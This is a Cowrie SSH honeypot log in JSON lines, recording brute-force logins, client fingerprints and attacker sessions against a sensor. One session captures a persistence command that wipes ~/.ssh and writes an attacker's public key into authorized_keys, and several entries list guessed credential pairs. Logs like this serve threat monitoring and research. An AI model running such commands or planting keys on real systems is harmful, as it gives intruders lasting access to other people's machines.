{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:11:31.091010Z","src_ip":"212.227.235.229","session":"34d713e4f650"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:11:31.878060Z","src_ip":"212.227.235.229","session":"34d713e4f650"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:32.065424Z","src_ip":"212.227.235.229","session":"34d713e4f650"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:32.066436Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10787,"dst_ip":"1.2.3.4","dst_port":22,"session":"b747c18d8a35","protocol":"ssh","message":"New connection: 212.227.235.229:10787 (1.2.3.4:22) [session: b747c18d8a35]","sensor":"my-vps","timestamp":"2025-08-28T15:11:54.806463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:11:54.863940Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T15:11:55.126802Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.login.success","username":"root","password":"100851%12344","message":"login attempt [root/100851%12344] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:11:56.756008Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:11:58.015677Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T15:11:58.016379Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:58.462449Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:58.581416Z","src_ip":"212.227.235.229","session":"b747c18d8a35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38982,"dst_ip":"1.2.3.4","dst_port":22,"session":"79cef70e81f7","protocol":"ssh","message":"New connection: 212.227.235.229:38982 (1.2.3.4:22) [session: 79cef70e81f7]","sensor":"my-vps","timestamp":"2025-08-28T15:12:36.270797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:12:36.271712Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:12:36.455065Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123###","message":"login attempt [root/abc123###] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:12:37.232529Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:12:37.615646Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:12:37.616333Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:12:37.617450Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:12:37.802418Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:12:38.225246Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:12:38.225950Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:12:38.411610Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:12:38.412563Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39568,"dst_ip":"1.2.3.4","dst_port":22,"session":"37cd4d9e291d","protocol":"ssh","message":"New connection: 212.227.235.229:39568 (1.2.3.4:22) [session: 37cd4d9e291d]","sensor":"my-vps","timestamp":"2025-08-28T15:12:38.592000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:12:38.593024Z","src_ip":"212.227.235.229","session":"37cd4d9e291d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:12:38.774869Z","src_ip":"212.227.235.229","session":"37cd4d9e291d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:12:39.542450Z","src_ip":"212.227.235.229","session":"37cd4d9e291d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:12:40.727544Z","src_ip":"212.227.235.229","session":"37cd4d9e291d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40560,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4ac97e3fe11","protocol":"ssh","message":"New connection: 212.227.235.229:40560 (1.2.3.4:22) [session: e4ac97e3fe11]","sensor":"my-vps","timestamp":"2025-08-28T15:12:40.911028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:12:40.911993Z","src_ip":"212.227.235.229","session":"e4ac97e3fe11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:12:41.094285Z","src_ip":"212.227.235.229","session":"e4ac97e3fe11"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:12:41.863559Z","src_ip":"212.227.235.229","session":"e4ac97e3fe11"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:12:42.046539Z","src_ip":"212.227.235.229","session":"79cef70e81f7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:12:42.047910Z","src_ip":"212.227.235.229","session":"e4ac97e3fe11"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56390,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c721a2046d7","protocol":"ssh","message":"New connection: 217.72.205.35:56390 (1.2.3.4:22) [session: 6c721a2046d7]","sensor":"my-vps","timestamp":"2025-08-28T15:12:58.240430Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:12:58.241877Z","src_ip":"217.72.205.35","session":"6c721a2046d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59082,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ba1c99f6a22","protocol":"ssh","message":"New connection: 212.227.125.160:59082 (1.2.3.4:22) [session: 1ba1c99f6a22]","sensor":"my-vps","timestamp":"2025-08-28T15:13:10.491163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:13:10.492439Z","src_ip":"212.227.125.160","session":"1ba1c99f6a22"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T15:13:10.541610Z","src_ip":"212.227.125.160","session":"1ba1c99f6a22"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T15:13:10.690325Z","src_ip":"212.227.125.160","session":"1ba1c99f6a22"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:13:11.741561Z","src_ip":"212.227.125.160","session":"1ba1c99f6a22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37506,"dst_ip":"1.2.3.4","dst_port":22,"session":"06de67e8b763","protocol":"ssh","message":"New connection: 212.227.235.229:37506 (1.2.3.4:22) [session: 06de67e8b763]","sensor":"my-vps","timestamp":"2025-08-28T15:13:47.875050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:13:47.875979Z","src_ip":"212.227.235.229","session":"06de67e8b763"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:13:48.058791Z","src_ip":"212.227.235.229","session":"06de67e8b763"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"test123","message":"login attempt [ftpuser/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:13:48.830279Z","src_ip":"212.227.235.229","session":"06de67e8b763"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:13:50.015517Z","src_ip":"212.227.235.229","session":"06de67e8b763"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":49311,"dst_ip":"1.2.3.4","dst_port":22,"session":"afb45e9f9ffc","protocol":"ssh","message":"New connection: 80.94.95.15:49311 (1.2.3.4:22) [session: afb45e9f9ffc]","sensor":"my-vps","timestamp":"2025-08-28T15:14:55.142399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:14:55.143388Z","src_ip":"80.94.95.15","session":"afb45e9f9ffc"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:14:55.210531Z","src_ip":"80.94.95.15","session":"afb45e9f9ffc"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T15:14:55.554585Z","src_ip":"80.94.95.15","session":"afb45e9f9ffc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:14:56.608708Z","src_ip":"80.94.95.15","session":"afb45e9f9ffc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35874,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6f64d2421e8","protocol":"ssh","message":"New connection: 212.227.235.229:35874 (1.2.3.4:22) [session: d6f64d2421e8]","sensor":"my-vps","timestamp":"2025-08-28T15:14:57.286691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:14:57.287526Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
